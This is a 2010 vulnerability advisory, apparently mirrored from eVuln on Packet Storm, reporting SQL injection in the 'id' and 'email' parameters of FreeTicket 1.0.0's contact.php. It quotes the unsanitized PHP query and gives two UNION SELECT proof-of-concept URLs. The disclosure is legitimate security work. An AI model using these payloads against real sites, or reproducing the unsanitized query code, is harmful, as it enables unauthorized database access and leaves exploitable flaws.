FreeTicket 1.0.0 SQL Injection

2010-11-25T00:00:00
ID PACKETSTORM:96138
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2010-11-25T00:00:00

Description

                                        
                                            `Subject: [eVuln.com] SQL injections in FreeTicket  
  
New eVuln Advisory:  
SQL injections in FreeTicket  
Summary: http://evuln.com/vulns/146/summary.html   
Details: http://evuln.com/vulns/146/description.html   
  
-----------Summary-----------  
eVuln ID: EV0146  
Software: FreeTicket  
Vendor: Mrcgiguy  
Version: 1.0.0  
Critical Level: medium  
Type: SQL injection  
Status: Unpatched. No reply from developer(s)  
PoC: Available  
Solution: Not available  
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )  
--------Description--------  
1. 'id' SQL injection  
Vulnerability found in contact.php script.  
User-defined variable id is not properly sanitized before being used in SQL query.  
This can be used to execute arbitrary SQL query.  
  
2. 'email' SQL injection  
Vulnerable script is contact.php script.  
'email' parameter is not properly sanitized before being used in SQL query.  
--------PoC/Exploit--------  
Vulnerable code.  
  
There is no SQL injection filter is used:  
$email = $_POST["email"]; $id = $_POST["id"];  
if (!$id) {$id = $_GET[id];} if (!$email) {$email = $_GET[email];}  
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");  
'id' SQL injection example.  
  
The following PoC code is available:  
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*  
'email' SQL injection example.  
  
PoC code:  
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*  
Condition.  
  
magic_quotes_gpc = off  
---------Solution----------  
Not available  
----------Credit-----------  
Vulnerability discovered by Aliaksandr Hartsuyeu  
http://evuln.com/xss/bbcode.html - recent XSS in bbcode  
`